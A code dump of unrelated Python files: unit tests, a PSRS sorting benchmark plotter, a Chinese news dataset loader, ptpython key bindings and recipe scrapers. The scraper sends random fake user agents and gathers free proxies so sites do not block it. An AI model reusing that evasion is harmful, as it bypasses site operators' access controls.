self.assertEqual(1, counter[subdirectory_added + os.sep])
def test_subdirectory_discard(self):
# Again, identical to 'test_directory_discard'.
# This "magic number" is questionable;
# but to maintain "test reproducibility" it is kept this way
add_count = 10
subdirectory_discarded = "Multics"
# Fail due to wrong type for the 'author' argument
with self.assertRaises(TypeError):
self.config.subdirectory_discard(None)
# Fail because the 'author' argument cannot be an empty string
with self.assertRaises(ValueError):
self.config.subdirectory_discard(str())
# Fail because the 'author' argument cannot contain non-printables
with self.assertRaises(ValueError):
self.config.subdirectory_discard("\t")
# The path separator will be automatically added in both
# 'directory_add' and 'directory_discard' member functions
for _ in range(add_count):
self.config.subdirectory_add(subdirectory_discarded)
self.config.subdirectory_discard(subdirectory_discarded)
# Success if the underlying representation
# for authors does not permit duplicates
self.assertNotIn(subdirectory_discarded,
self.config.subdirectories_get())
self.assertNotIn(subdirectory_discarded + os.sep,
self.config.subdirectories_get())
def test_subdirectories_get(self):
# Test directory names with non-ascii characters
subdirectories = ["Луноход" + os.sep, "玉兔" + os.sep]
get_result = None
self.config.subdirectories_set(subdirectories)
get_result = self.config.subdirectories_get()
self.assertCountEqual(subdirectories, get_result)
# --------------------------------- CLASSES -----------------------------------
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jhxie/psrs",
"score": 2
} |
#### File: psrs/tools/plot.py
```python
__all__ = ["speedup_plot", "runtime_tabulate", "runtime_plot",
"stdev_tabulate", "phase_pie_plot"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import argparse
import math
import matplotlib
import matplotlib.pyplot as plt
import os
import random
import shutil
import struct
import subprocess
# Note 'Axes3d' is used implicitly by matplotlib
from mpl_toolkits.mplot3d import Axes3D
from typing import Dict, List, Tuple
# --------------------------------- MODULES -----------------------------------
# ------------------------------ TYPE ALIASES ---------------------------------
# The 'runtime_dict' returned by 'speedup_plot' is a 'dict' with keys
# of the following form:
RunTimeKey = Tuple[int, Tuple[int]]
ValPair = Tuple[float, float]
# an example entry in the 'runtime_dict' would be
# (1024, (1, 2, 4, 8)): [[0.4, 0.1], [0.3, 0.1], [0.2, 0.1], [0.1 0.1]]
# which denotes:
# (number of keys sorted, (number of processes used as tests)):
# [[sorting time, standard deviation (error)]]
# ------------------------------ TYPE ALIASES ---------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def speedup_plot(program: str, output: str) -> Dict[RunTimeKey, List[ValPair]]:
"""
Plots the speedup graph based on the given 'program' that implements the
Parallel Sorting by Regular Sampling algorithm and saves the graph as
'output', also returns a 'dict' containing actual runtimes in the form
described in 'TYPE ALIASES' section.
NOTE:
The PSRS program must support a command line interface of the following:
' -b -l {length} -r {run} -s {seed} -w {window}'
and this function hard-coded the length to be range of:
[2 ** e for e in range(19, 26, 2)] -> 2 ** 19 -- 2 ** 26 with step 2
the number of processes is hard-coded to be range of:
[2 ** e for e in range(4)] -> 2 ** 0 -- 2 ** 3
the {run} is fixed at 7, and {window} is set to 5.
Reference:
https://docs.python.org/3/library/subprocess.html
"""
if not all(isinstance(check, str) for check in locals().values()):
raise TypeError("'program' and 'output' must be of 'str' type")
if not shutil.which(program):
raise ValueError("'program' is not found")
if not shutil.which("mpiexec"):
raise ValueError("'mpiexec' is not found")
mean_time = None
std_err = None
mpi_prefix = "mpiexec -n {process} "
psrs_flags = " -b -l {length} -r {run} -s {seed} -w {window}"
program = mpi_prefix + program + psrs_flags
argument_dict = dict(run=7, seed=10, window=5)
process_range = tuple(2 ** e for e in range(4))
# length_range = tuple(2 ** e for e in range(21, 28, 2))
length_range = tuple(2 ** e for e in range(19, 26, 2))
# length_range = tuple(2 ** e for e in range(9, 16, 2))
legend_range = ("o", "s", "^", "*")
color_range = ("g", "y", "m", "r")
runtime_keys = [(length, process_range) for length in length_range]
runtime_dict = {runtime_key: list() for runtime_key in runtime_keys}
speedup_vector = list()
extension = os.path.splitext(output)[-1]
if not extension:
raise ValueError("The output must have a valid file extension")
plt.title("Speedup Graph")
plt.xticks(process_range)
plt.yticks(process_range)
plt.xlabel("Number of Processes", fontsize="large")
plt.ylabel(r"Speedup ($T_1$ / $T_p$)", fontsize="large")
# The format for axis range is [xmin, xmax, ymin, ymax].
plt.axis([0, process_range[-1] + 2, 0, process_range[-1] + 2])
# The Linear Speedup Reference Line
plt.plot(process_range, process_range,
color="c", label="Linear", linestyle="--",
marker="+", markersize=10)
for length, legend, color in zip(length_range, legend_range, color_range):
argument_dict["length"] = length
speedup_vector.clear()
for process_count in process_range:
argument_dict["process"] = process_count
command = program.format(**argument_dict).split()
# Let 'psrs' program write the moving average and standard error in
# binary form, rather than the human-readable text form, because
# 'printf' cannot print exact values of floating-point numbers that
# easily.
# 'psrs' calls 'fwrite' to write the moving average and standard
# error into the 'subprocess.PIPE', and is parsed by the 'unpack'
# mechanism.
# The method 'communicate' returns a tuple of the form
# (stdout_data, stderr_data)
# here only the first element is of interest.
# The result of 'unpack' method call is a tuple regardless of the
# data to be unpacked; since the output of 'psrs' are two
# double floating-point values, only the first two elements
# are needed.
with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:
mean_time, std_err = struct.unpack("dd", proc.communicate()[0])
if 1 != process_count:
# Speedup = T1 / Tp
speedup = speedup_vector[0] / mean_time
else:
speedup = mean_time
speedup_vector.append(speedup)
runtime_dict[(length, process_range)].append([mean_time, std_err])
# The speedup for the 1 process case is always 1
# set outside the inner loop because all the speedup values in
# the 'speedup_vector' need to be calculated based on the T1
speedup_vector[0] = 1.0
plt.plot(process_range, speedup_vector,
color=color, label=_log2_exponent_get(length), linestyle="--",
marker=legend, markersize=10)
plt.legend(loc="best", title="Length")
plt.savefig(output)
plt.clf()
return runtime_dict
def runtime_tabulate(runtime: Dict[RunTimeKey, List[ValPair]], output: str):
"""
Tabulates mean sorting time with number of processes as x axis (row) and
length of array as y axis (column).
NOTE: Assumes all the values in 'runtime' is of same length; so there
are same number of processes tested for each length.
"""
if not (isinstance(runtime, dict) and isinstance(output, str)):
raise TypeError("'runtime' and 'output' need to be of 'dict', 'str'"
" types, respectively")
length_range = [float(key[0]) for key in sorted(runtime.keys())]
length_labels = [_log2_exponent_get(length) for length in length_range]
process_range = random.choice(list(runtime.keys()))[-1]
process_labels = list()
runtime_matrix = [runtime[key] for key in sorted(runtime.keys())]
# standard errors are not needed, so an extra step
# is needed to discard them
runtime_matrix = [[j[0] for j in i] for i in runtime_matrix]
runtime_format = [["{0:f}".format(j) for j in i] for i in runtime_matrix]
for process in process_range:
label = "{0} Process{1}".format(process, "" if 1 == process else "es")
process_labels.append(label)
# plt.axis("tight")
plt.axis("off")
plt.title("Sorting Time in Moving Average (second)")
table = plt.table(cellText=runtime_format,
rowLabels=length_labels,
colLabels=process_labels,
loc="center")
# table.set_fontsize("large")
# table.scale(1.2, 1.2)
table.scale(1, 4.5)
# figure = plt.gcf()
# figure.set_size_inches(10, 6)
plt.savefig(output)
plt.clf()
def runtime_plot(runtime: Dict[RunTimeKey, List[ValPair]], output: str):
"""
Plots the runtime using a 3-D bar chart with number of processes and length
of array as categorical variables.
Reference:
http://matplotlib.org/examples/mplot3d/bars3d_demo.html
"""
if not (isinstance(runtime, dict) and isinstance(output, str)):
raise TypeError("'runtime' and 'output' need to be of 'dict', 'str'"
" types, respectively")
color_range = ("g", "y", "m", "r")
length_range = [float(key[0]) for key in sorted(runtime.keys())]
length_labels = [_log2_exponent_get(length) for length in length_range]
# Make each group (in terms of length of array in this case) evenly spaced
length_arrange = [i for i in range(len(length_range))]
process_range = random.choice(list(runtime.keys()))[-1]
process_labels = [str(i) for i in process_range]
# Make each group (in terms of number of processes) evenly spaced
process_arrange = [i for i in range(len(process_range))]
runtime_matrix = [runtime[key] for key in sorted(runtime.keys())]
# standard errors are not needed, so an extra step
# is needed to discard them
runtime_matrix = [[j[0] for j in i] for i in runtime_matrix]
extension = os.path.splitext(output)[-1]
iterate = zip(runtime_matrix, length_arrange, length_labels, color_range)
if not extension:
raise ValueError("The 'output' must have a valid file extension")
fig = plt.figure()
ax = fig.add_subplot(111, projection="3d")
ax.set_xlabel("Number of Processes")
ax.set_ylabel("Length of Array")
ax.set_zlabel("Sorting Time")
plt.title("Sorting Time Per Group")
plt.xticks(process_arrange, process_labels)
plt.yticks(length_arrange, length_labels)
for vector, length, label, color in iterate:
ax.bar(process_arrange,
vector,
zs=length,
zdir="y",
color=color,
alpha=0.5)
# fig.set_size_inches(10, 6)
plt.savefig(output)
plt.clf()
def stdev_tabulate(runtime: Dict[RunTimeKey, List[ValPair]], output: str):
"""
Tabulates standard deviation of sorting time with number of processes as x
axis (row) and length of array as y axis (column).
NOTE: Assumes all the values in 'runtime' is of same length; so there
are same number of processes tested for each length.
"""
if not (isinstance(runtime, dict) and isinstance(output, str)):
raise TypeError("'runtime' and 'output' need to be of 'dict', 'str'"
" types, respectively")
length_range = [float(key[0]) for key in sorted(runtime.keys())]
length_labels = [_log2_exponent_get(length) for length in length_range]
process_range = random.choice(list(runtime.keys()))[-1]
process_labels = list()
runtime_matrix = [runtime[key] for key in sorted(runtime.keys())]
# mean sorting times are not needed, so an extra step
# is needed to discard them
runtime_matrix = [[j[-1] for j in i] for i in runtime_matrix]
runtime_format = [["{0:f}".format(j) for j in i] for i in runtime_matrix]
for process in process_range:
label = "{0} Process{1}".format(process, "" if 1 == process else "es")
process_labels.append(label)
# plt.axis("tight")
plt.axis("off")
plt.title("Standard Deviation for Sorting Time")
table = plt.table(cellText=runtime_format,
rowLabels=length_labels,
colLabels=process_labels,
loc="center")
# table.set_fontsize("large")
# table.scale(1.2, 1.2)
table.scale(1, 4.5)
# figure = plt.gcf()
# figure.set_size_inches(10, 6)
plt.savefig(output)
plt.clf()
def phase_pie_plot(program: str, length: int, output: str):
"""
Plots a per-phase running time pie chart based on the 'length' given.
NOTE:
Number of processes is hard-coded as 4.
Reference:
http://matplotlib.org/examples/pie_and_polar_charts/pie_demo_features.html
http://stackoverflow.com/questions/19852215/
how-to-add-a-legend-to-matplotlib-pie-chart
"""
if not all(map(isinstance, (program, length, output), (str, int, str))):
raise TypeError("'program', 'length', 'output' must be of "
" 'str' 'int' 'str' type, respectively")
if not shutil.which(program):
raise ValueError("'program' is not found")
if not shutil.which("mpiexec"):
raise ValueError("'mpiexec' is not found")
phase_time = [None] * 4
phase_percent = None
total_time = None
process = 4
mpi_prefix = "mpiexec -n {process} "
# use '-p' command line flag to let 'psrs' prorgram return per-phase time
psrs_flags = " -b -p -l {length} -r {run} -s {seed} -w {window}"
program = mpi_prefix + program + psrs_flags
argument_dict = dict(length=length,
process=process,
run=1,
seed=10,
window=1)
color_range = ["yellowgreen", "gold", "lightskyblue", "lightcoral"]
explode_range = (0.1, 0, 0, 0)
phase_labels = ["Phase " + str(i) for i in range(1, 5)]
length_label = _log2_exponent_get(length)
title = ("Per-Phase Runtime "
"(Array Length = {0}, "
"Number of Processes = {1})").format(length_label, process)
command = program.format(**argument_dict).split()
with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:
# The method 'communicate' returns a tuple of the form
# (stdout_data, stderr_data)
# here only the first element is of interest.
phase_time[0], phase_time[1], phase_time[2], phase_time[3] = \
struct.unpack("dddd", proc.communicate()[0])
total_time = sum(phase_time)
phase_percent = [phase / total_time * 100 for phase in phase_time]
plt.title(title)
plt.pie(phase_percent,
explode=explode_range,
colors=color_range,
autopct="%1.1f%%",
shadow=True,
startangle=90)
plt.axis("equal")
plt.legend(phase_labels, loc="best")
plt.savefig(output)
plt.clf()
def _log2_exponent_get(number: float) -> str:
"""
Returns a specially formatted string of the result log2(number).
NOTE: The result log2(number) must be an integer.
"""
result = math.log2(number)
if not result.is_integer():
raise ValueError("The result exponent must be an integer")
result = int(result)
return r"$\mathregular{2^{" + str(result) + r"}}$"
def main():
"""
Main command line driver.
"""
parser = argparse.ArgumentParser()
attr_desc_dict = {
"deviation": "file name of sorting time standard deviation table",
"executable": "path to the PSRS executable",
"pie": "base file name of pie chart for per-phase sorting time",
"speedup": "file name of the speed-up plot",
"table": "file name of the running time summary table",
"runtime": "3-d bar chart of the running time summary"
}
for flag, msg in attr_desc_dict.items():
parser.add_argument("-" + flag[0],
"--" + flag,
type=str,
required=False,
help=msg)
args = parser.parse_args()
if all(getattr(args, attr) for attr in attr_desc_dict):
matplotlib.rc('font',
**{'sans-serif': 'Arial', 'family': 'sans-serif'})
runtime_dict = speedup_plot(args.executable, args.speedup)
runtime_tabulate(runtime_dict, args.table)
stdev_tabulate(runtime_dict, args.deviation)
runtime_plot(runtime_dict, args.runtime)
pie_base, pie_base_ext = os.path.splitext(args.pie)
if not pie_base_ext or "." == pie_base_ext:
raise ValueError("'{pie}' must have a "
"proper extension".format(args.pie))
phase_pie_plot(args.executable, 2 ** 21, pie_base + "0" + pie_base_ext)
phase_pie_plot(args.executable, 2 ** 27, pie_base + "1" + pie_base_ext)
# -------------------------------- FUNCTIONS ----------------------------------
if __name__ == "__main__":
main()
``` |
{
"source": "jhxu-org/datasets",
"score": 2
} |
#### File: datasets/thuc_news/thuc_news.py
```python
import csv
import ctypes
import os
import datasets
csv.field_size_limit(int(ctypes.c_ulong(-1).value // 2))
_CITATION = """\
@misc{xujianhua,
title={page xxx},
author={<NAME> and <NAME> and <NAME>},
year={2015},
eprint={1509.01626},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
"""
_DESCRIPTION = """\
THUCTC(THU Chinese Text Classification)是由清华大学自然语言处理实验室推出的中文文本分类工具包,能够自动高效地实现用户自定义的文本分类语料的训练、\
评测、分类功能。文本分类通常包括特征选取、特征降维、分类模型学习三个步骤。如何选取合适的文本特征并进行降维,是中文文本分类的挑战性问题。、
我组根据多年在中文文本分类的研究经验,在THUCTC中选取二字串bigram作为特征单元,特征降维方法为Chi-square,权重计算方法为tfidf,、
分类模型使用的是LibSVM或LibLinear。THUCTC对于开放领域的长文本具有良好的普适性,不依赖于任何中文分词工具的性能,具有准确率高、测试速度快的优点。
"""
_DATA_URL = "http://127.0.0.1/thuc_news.zip"
_CLS = ['体育', '娱乐', '家居', '彩票', '房产', '教育', '时尚', '时政', '星座', '游戏', '社会', '科技', '股票', '财经']
class THUC_News(datasets.GeneratorBasedBuilder):
"""Sogou News dataset"""
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"content": datasets.Value("string"),
"label": datasets.features.ClassLabel(
names=_CLS
),
}
),
# No default supervised_keys (as we have to pass both premise
# and hypothesis as input).
supervised_keys=None,
homepage="", # didn't find a real homepage
citation=_CITATION,
)
def _split_generators(self, dl_manager):
dl_dir = dl_manager.download_and_extract(_DATA_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TEST, gen_kwargs={"filepath": os.path.join(dl_dir, "thuc_news", "test.txt")}
),
datasets.SplitGenerator(
name=datasets.Split.TRAIN, gen_kwargs={"filepath": os.path.join(dl_dir, "thuc_news", "train.txt")}
),
]
def _generate_examples(self, filepath):
"""This function returns the examples in the raw (text) form."""
with open(filepath, encoding="utf-8") as txt_file:
data = txt_file.readlines()
for id_, row in enumerate(data):
row = row.split('\t')
yield id_, {"content": row[1], "label": _CLS.index(row[0])}
``` |
{
"source": "jhy1000/github",
"score": 3
} |
#### File: github/src/db.py
```python
import redis
def get_redis():
redis_conf = {
'host': '127.0.0.1',
'port': 6379,
'db': 0
}
pool = redis.ConnectionPool(host=redis_conf['host'], port=redis_conf['port'], db=redis_conf['db'])
return redis.StrictRedis(connection_pool=pool)
REDIS = get_redis()
``` |
{
"source": "jhylands/ptpython",
"score": 2
} |
#### File: ptpython/ptpython/key_bindings.py
```python
from prompt_toolkit.application import get_app
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (
Condition,
emacs_insert_mode,
emacs_mode,
has_focus,
has_selection,
vi_insert_mode,
)
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.bindings.named_commands import get_by_name
from prompt_toolkit.keys import Keys
from .utils import document_is_multiline_python
__all__ = [
"load_python_bindings",
"load_sidebar_bindings",
"load_confirm_exit_bindings",
]
@Condition
def tab_should_insert_whitespace():
"""
When the 'tab' key is pressed with only whitespace character before the
cursor, do autocompletion. Otherwise, insert indentation.
Except for the first character at the first line. Then always do a
completion. It doesn't make sense to start the first line with
indentation.
"""
b = get_app().current_buffer
before_cursor = b.document.current_line_before_cursor
return bool(b.text and (not before_cursor or before_cursor.isspace()))
def load_python_bindings(python_input):
"""
Custom key bindings.
"""
bindings = KeyBindings()
sidebar_visible = Condition(lambda: python_input.show_sidebar)
handle = bindings.add
@handle("c-l")
def _(event):
"""
Clear whole screen and render again -- also when the sidebar is visible.
"""
event.app.renderer.clear()
@handle("c-z")
def _(event):
"""
Suspend.
"""
if python_input.enable_system_bindings:
event.app.suspend_to_background()
# Delete word before cursor, but use all Python symbols as separators
# (WORD=False).
handle("c-w")(get_by_name("backward-kill-word"))
@handle("f2")
def _(event):
"""
Show/hide sidebar.
"""
python_input.show_sidebar = not python_input.show_sidebar
if python_input.show_sidebar:
event.app.layout.focus(python_input.ptpython_layout.sidebar)
else:
event.app.layout.focus_last()
@handle("f3")
def _(event):
"""
Select from the history.
"""
python_input.enter_history()
@handle("f4")
def _(event):
"""
Toggle between Vi and Emacs mode.
"""
python_input.vi_mode = not python_input.vi_mode
@handle("f6")
def _(event):
"""
Enable/Disable paste mode.
"""
python_input.paste_mode = not python_input.paste_mode
@handle(
"tab", filter=~sidebar_visible & ~has_selection & tab_should_insert_whitespace
)
def _(event):
"""
When tab should insert whitespace, do that instead of completion.
"""
event.app.current_buffer.insert_text(" ")
@Condition
def is_multiline():
return document_is_multiline_python(python_input.default_buffer.document)
@handle(
"enter",
filter=~sidebar_visible
& ~has_selection
& (vi_insert_mode | emacs_insert_mode)
& has_focus(DEFAULT_BUFFER)
& ~is_multiline,
)
@handle(Keys.Escape, Keys.Enter, filter=~sidebar_visible & emacs_mode)
def _(event):
"""
Accept input (for single line input).
"""
b = event.current_buffer
if b.validate():
# When the cursor is at the end, and we have an empty line:
# drop the empty lines, but return the value.
b.document = Document(
text=b.text.rstrip(), cursor_position=len(b.text.rstrip())
)
b.validate_and_handle()
@handle(
"enter",
filter=~sidebar_visible
& ~has_selection
& (vi_insert_mode | emacs_insert_mode)
& has_focus(DEFAULT_BUFFER)
& is_multiline,
)
def _(event):
"""
Behaviour of the Enter key.
Auto indent after newline/Enter.
(When not in Vi navigaton mode, and when multiline is enabled.)
"""
b = event.current_buffer
empty_lines_required = python_input.accept_input_on_enter or 10000
def at_the_end(b):
"""we consider the cursor at the end when there is no text after
the cursor, or only whitespace."""
text = b.document.text_after_cursor
return text == "" or (text.isspace() and not "\n" in text)
if python_input.paste_mode:
# In paste mode, always insert text.
b.insert_text("\n")
elif at_the_end(b) and b.document.text.replace(" ", "").endswith(
"\n" * (empty_lines_required - 1)
):
# When the cursor is at the end, and we have an empty line:
# drop the empty lines, but return the value.
if b.validate():
b.document = Document(
text=b.text.rstrip(), cursor_position=len(b.text.rstrip())
)
b.validate_and_handle()
else:
auto_newline(b)
@handle(
"c-d",
filter=~sidebar_visible
& has_focus(python_input.default_buffer)
& Condition(
lambda:
# The current buffer is empty.
not get_app().current_buffer.text
),
)
def _(event):
"""
Override Control-D exit, to ask for confirmation.
"""
if python_input.confirm_exit:
# Show exit confirmation and focus it (focusing is important for
# making sure the default buffer key bindings are not active).
python_input.show_exit_confirmation = True
python_input.app.layout.focus(
python_input.ptpython_layout.exit_confirmation
)
else:
event.app.exit(exception=EOFError)
@handle("c-c", filter=has_focus(python_input.default_buffer))
def _(event):
" Abort when Control-C has been pressed. "
event.app.exit(exception=KeyboardInterrupt, style="class:aborting")
return bindings
def load_sidebar_bindings(python_input):
"""
Load bindings for the navigation in the sidebar.
"""
bindings = KeyBindings()
handle = bindings.add
sidebar_visible = Condition(lambda: python_input.show_sidebar)
@handle("up", filter=sidebar_visible)
@handle("c-p", filter=sidebar_visible)
@handle("k", filter=sidebar_visible)
def _(event):
" Go to previous option. "
python_input.selected_option_index = (
python_input.selected_option_index - 1
) % python_input.option_count
@handle("down", filter=sidebar_visible)
@handle("c-n", filter=sidebar_visible)
@handle("j", filter=sidebar_visible)
def _(event):
" Go to next option. "
python_input.selected_option_index = (
python_input.selected_option_index + 1
) % python_input.option_count
@handle("right", filter=sidebar_visible)
@handle("l", filter=sidebar_visible)
@handle(" ", filter=sidebar_visible)
def _(event):
" Select next value for current option. "
option = python_input.selected_option
option.activate_next()
@handle("left", filter=sidebar_visible)
@handle("h", filter=sidebar_visible)
def _(event):
" Select previous value for current option. "
option = python_input.selected_option
option.activate_previous()
@handle("c-c", filter=sidebar_visible)
@handle("c-d", filter=sidebar_visible)
@handle("c-d", filter=sidebar_visible)
@handle("enter", filter=sidebar_visible)
@handle("escape", filter=sidebar_visible)
def _(event):
" Hide sidebar. "
python_input.show_sidebar = False
event.app.layout.focus_last()
return bindings
def load_confirm_exit_bindings(python_input):
"""
Handle yes/no key presses when the exit confirmation is shown.
"""
bindings = KeyBindings()
handle = bindings.add
confirmation_visible = Condition(lambda: python_input.show_exit_confirmation)
@handle("y", filter=confirmation_visible)
@handle("Y", filter=confirmation_visible)
@handle("enter", filter=confirmation_visible)
@handle("c-d", filter=confirmation_visible)
def _(event):
"""
Really quit.
"""
event.app.exit(exception=EOFError, style="class:exiting")
@handle(Keys.Any, filter=confirmation_visible)
def _(event):
"""
Cancel exit.
"""
python_input.show_exit_confirmation = False
python_input.app.layout.focus_previous()
return bindings
def auto_newline(buffer):
r"""
Insert \n at the cursor position. Also add necessary padding.
"""
insert_text = buffer.insert_text
if buffer.document.current_line_after_cursor:
# When we are in the middle of a line. Always insert a newline.
insert_text("\n")
else:
# Go to new line, but also add indentation.
current_line = buffer.document.current_line_before_cursor.rstrip()
insert_text("\n")
# Unident if the last line ends with 'pass', remove four spaces.
unindent = current_line.rstrip().endswith(" pass")
# Copy whitespace from current line
current_line2 = current_line[4:] if unindent else current_line
for c in current_line2:
if c.isspace():
insert_text(c)
else:
break
# If the last line ends with a colon, add four extra spaces.
if current_line[-1:] == ":":
for x in range(4):
insert_text(" ")
``` |
{
"source": "jhylands/recipe-scrapers",
"score": 3
} |
#### File: recipe-scrapers/recipe_scrapers/JsonScraper.py
```python
from .Proxy import Proxy
from fake_useragent import UserAgent
from bs4 import BeautifulSoup
import json
import requests
# some sites close their content for 'bots', so user-agent must be supplied using random user agent
ua = UserAgent() # From here we generate a random user agent
class JSONScraper():
header = {'User-Agent': str(ua.random)}
def __getattribute__(self, name):
"""
Decorate custom methods to handle exceptions as we want and as we
specify in the "on_exception_return" method decorator
"""
to_return = None
decorated_methods = [
'title',
'total_time',
'instructions',
'ingredients',
'links',
'URL',
'description',
'imgURL',
'sodium',
'fat',
'cholesterol',
'carbs',
'calories',
'category'
]
if name in decorated_methods:
to_return = ''
if name == 'total_time':
to_return = 0
if name == 'ingredients':
to_return = []
if name == 'links':
to_return = []
if to_return is not None:
return on_exception_return(to_return)(object.__getattribute__(self, name))
return object.__getattribute__(self, name)
def __init__(self, url,proxy=False, test=False):
if proxy:
self.proxies = Proxy()
self.proxy = getProxy()
else:
self.proxy = None
if test: # when testing, we load a file
with url:
self.soup = BeautifulSoup(
url.read(),
"html.parser"
)
else:
response = requests.get(url, headers=self.header, proxies=self.proxy)
self.soup = BeautifulSoup(response.content, 'lxml')
for recipe in self.soup.find_all('script', type='application/ld+json'):
self.JSON = recipe.text
self.data = json.loads(recipe.text)
self.url = url
def url(self):
return self.url
def host(self):
""" get the host of the url, so we can use the correct scraper (check __init__.py) """
raise NotImplementedError("This should be implemented.")
def title(self):
raise NotImplementedError("This should be implemented.")
def servings(self):
raise NotImplementedError("This should be implemented.")
def total_time(self):
""" total time it takes to preparate the recipe in minutes """
raise NotImplementedError("This should be implemented.")
def ingredients(self):
raise NotImplementedError("This should be implemented.")
def instructions(self):
raise NotImplementedError("This should be implemented.")
def URL(self):
raise NotImplementedError("This should be implemented.")
def description(self):
raise NotImplementedError("This should be implemented.")
def imgURL(self):
raise NotImplementedError("This should be implemented.")
def sodium(self):
raise NotImplementedError("This should be implemented.")
def fat(self):
raise NotImplementedError("This should be implemented.")
def cholesterol(self):
raise NotImplementedError("This should be implemented.")
def carbs(self):
raise NotImplementedError("This should be implemented.")
def calories(self):
raise NotImplementedError("This should be implemented.")
def category(self):
raise NotImplementedError("This should be implemented.")
def datePublished(self):
raise NotImplementedError("This should be implemented.")
def links(self):
invalid_href = ('#', '')
links_html = self.soup.findAll('a', href=True)
return [
link.attrs
for link in links_html
if link['href'] not in invalid_href
]
```
#### File: recipe-scrapers/recipe_scrapers/pinchofyum.py
```python
from .JsonScraper import JSONScraper
from ._utils import get_minutes, normalize_string, dateCleaner
class PinchOfYum(JSONScraper):
@classmethod
def host(self):
return 'pinchofyum.com'
def title(self):
return self.data["name"]
'''{
"@context": "https:\/\/schema.org\/",
"@type": "Recipe",
"name": "Chopped Thai Noodle Salad with Peanut Dressing",
"description": "Thai Noodle Salad with Peanut Lime Dressing - veggies, chicken, brown rice noodles, and an easy homemade dressing. My favorite salad ever!",
"author": {
"@type": "Thing",
"name": "<NAME>"
},
"image": [
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe-225x225.jpg",
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe-260x195.jpg",
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe-320x180.jpg",
"https:\/\/pinchofyum.com\/wp-content\/uploads\/Thai-Salad-Recipe.jpg"
],
"url": "https:\/\/pinchofyum.com\/thai-noodle-salad",
"recipeIngredient": [
"1\/2 cup canola oil",
"2 large cloves garlic, peeled",
"1\/3 cup low sodium soy sauce",
"1\/4 cup white distilled vinegar",
"2 tablespoons water",
"2 tablespoons honey",
"2 tablespoons sesame oil",
"1 tablespoon lemongrass or ginger paste",
"a couple BIG squeezes of lime juice (to taste)",
"1\/4 cup peanut butter",
"4 ounces brown rice noodles (affiliate link)",
"1 lb. boneless skinless chicken breasts",
"5-6 cups baby kale or spinach",
"3 large carrots, cut into small, thin pieces*",
"3 bell peppers, cut into small, thin pieces*",
"1 cup packed cilantro leaves, chopped",
"4 green onions, green parts only, chopped",
"1\/2 cup cashews or peanuts"
],
"recipeInstructions": [
"PREP: Start soaking the rice noodles in a bowl of cold water. Preheat the oven to 400 degrees.",
"DRESSING: Pulse all the dressing ingredients in a food processor EXCEPT peanut butter. Place the chicken in a plastic bag and use about 1\/4 to 1\/2 cup of the dressing (without peanut butter) to marinate the chicken in the fridge for about 15-30 minutes. Add the peanut butter to the dressing in the food processor; pulse, then taste and adjust. Set aside.",
"VEGGIES: Prep all your veggies and toss together in a bowl.",
"CHICKEN: Bake the marinated chicken for 15-20 minutes. Rest for 5-10 minutes, then cut and add to the veggies.",
"NOODLES: Drain the noodles (they should be softened at this point). Finish cooking them in a skillet over medium high heat. Add a little oil and a little dressing and toss them around until they are soft and pliable (if you need to add a little water to soften them, that works, too).",
"ASSEMBLY: Toss stir-fried noodles with the chicken and veggie mixture. Serve hot or cold. Top with extra peanuts and cilantro (and dressing, and lime juice, and sesame seeds, and...)"
],
"prepTime": "PT45M",
"cookTime": "PT20M",
"totalTime": "PT1H5M",
"recipeYield": "6",
"aggregateRating": {
"@type": "AggregateRating",
"reviewCount": 34,
"ratingValue": 4.7
}
'''
#need to figure out something for date published
def datePublished(self):
date = dateCleaner("null",6)
return date
def description(self):
return self.data["description"]
def total_time(self):
return get_minutes(data["totalTime"])
def ingredients(self):
ing = ""
ingList = self.data['recipeIngredient']
i = 0
while i < len(ingList):
ing += ingList[i] + "\n"
i += 1
return ing
def instructions(self):
#this is a nested array
instrList = self.data['recipeInstructions']
i = 0
instr = ""
while i < len(instrList):
instr += instrList[i] + "\n"
i += 1
return instr
def category(self):
return self.data["recipeCategory"][0]
def imgURL(self):
return self.data["image"][3]
def sodium(self):
return self.data["nutrition"]["sodiumContent"]
def fat(self):
return self.data["nutrition"]["fatContent"]
def carbs(self):
return self.data["nutrition"]["carbohydrateContent"]
def calories(self):
return self.data["nutrition"]["calories"]
```
#### File: recipe-scrapers/recipe_scrapers/Proxy.py
```python
class Proxy():
proxies = [] # Will contain proxies [ip, port]
#### adding proxy information so as not to get blocked so fast
def getProxyList(self):
# Retrieve latest proxies
url = 'https://www.sslproxies.org/'
header = {'User-Agent': str(ua.random)}
response = requests.get(url, headers=header)
soup = BeautifulSoup(response.text, 'lxml')
proxies_table = soup.find(id='proxylisttable')
try:
# Save proxies in the array
for row in proxies_table.tbody.find_all('tr'):
self.proxies.append({
'ip': row.find_all('td')[0].string,
'port': row.find_all('td')[1].string
})
except:
print("error in getting proxy from ssl proxies")
return proxies
def getProxyList2(self,proxies):
# Retrieve latest proxies
try:
url = 'http://list.proxylistplus.com/SSL-List-1'
header = {'User-Agent': str(ua.random)}
response = requests.get(url, headers=header)
soup = BeautifulSoup(response.text, 'lxml')
proxies_table = soup.find("table", {"class": "bg"})
#print(proxies_table)
# Save proxies in the array
for row in proxies_table.find_all("tr", {"class": "cells"}):
google = row.find_all('td')[5].string
if google == "yes":
#print(row.find_all('td')[1].string)
self.proxies.append({
'ip': row.find_all('td')[1].string,
'port': row.find_all('td')[2].string
})
except:
print("broken")
# Choose a random proxy
try:
url = 'http://list.proxylistplus.com/SSL-List-2'
header = {'User-Agent': str(ua.random)}
response = requests.get(url, headers=header)
soup = BeautifulSoup(response.text, 'lxml')
proxies_table = soup.find("table", {"class": "bg"})
# print(proxies_table)
# Save proxies in the array
for row in proxies_table.find_all("tr", {"class": "cells"}):
google = row.find_all('td')[5].string
if google == "yes":
